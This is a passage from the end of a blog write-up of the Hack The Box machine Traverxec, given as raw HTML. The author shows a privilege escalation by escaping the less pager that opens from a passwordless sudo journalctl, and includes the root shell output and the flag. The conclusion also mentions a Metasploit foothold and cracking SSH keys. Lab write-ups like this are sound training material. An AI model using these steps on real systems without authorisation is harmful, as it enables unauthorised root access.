echo &#34;Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`&#34;
echo &#34; &#34;
echo &#34;Last 5 journal log lines:&#34;
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$ 
</code></pre><p>Knowing that this script is calling <code>journalctl</code> as root means that it&rsquo;s most definitely going to be what we need to exploit for our privilege escalation. Looking at <a href="https://gtfobins.github.io/gtfobins/journalctl/" target="_blank">GTFOBins</a> for <code>journalctl</code> it states that the pager will be invoked (<code>less</code>). We can pop a shell using <code>!/bin/sh</code>, or we can execute basically any commands we&rsquo;d like if we precede them with <code>!</code>.</p>
<p>After some playing around we can confirm that executing <code>/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service</code> does not require us to enter a password, and does indeed invoke <code>less</code>. All we need to do in order to exploit this is to shrink the terminal window down a bit, under 6 lines, and execute <code>!/bin/bash</code> to get our root shell.</p>
<pre tabindex="0"><code>david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2019-12-17 10:09:44 EST, end at Tue 2019-12-17 11:38:42 EST. --
Dec 17 11:15:54 traverxec sudo[2264]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Dec 17 11:15:54 traverxec sudo[2264]: www-data : command not allowed ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=list
Dec 17 11:18:40 traverxec sudo[2319]: pam_unix(sudo:auth): conversation failed
Dec 17 11:18:40 traverxec sudo[2319]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Dec 17 11:18:40 traverxec sudo[2319]: www-data : command not allowed ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=list
!/usr/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:/home/david/bin# 
</code></pre><h1 id="conclusion">Conclusion</h1>
<p>This box was really straight forward for the most part. The initial foothold was obvious, and using the Metasploit module made it very easy. Finding the public directory inside David&rsquo;s home directory via the nostromo configuration was probably the most confusing part, at least from my perspective. Once we found that directory, Meterpreter allowed us to download the backup file of ssh keys quite easily. The keys did have a password, but cracking this was also rather simple since the password would be present on almost any wordlist. The path to root was clear immediately after gaining access as the user. While the method we were to use to exploit it was also clear right away, actually doing so still took me about a day, as I was over thinking it a bit. Traverxec was a fun box, and well named. It was my first box in quite a few months, and a nice reintroduction.</p>

  
  <hr>
<div class="footer">
    
	    
            <a class="previous-post" href="/posts/plenty-of-phish-trust-and-gtlds/?ref=footer"><span style="font-weight:bold;">« Previous</span><br>Plenty of Phish Trust and Gtlds</a>
        
	    
            <div class="next-post">
                <a href="/posts/hack-the-box-traceback-writeup/?ref=footer"><span style="font-weight:bold;">Next »</span><br>Hack the Box Traceback Writeup</a>
            </div>
        
    
</div>

  
</div>
            </main>
            
  

        </div>
    </body>
</html>
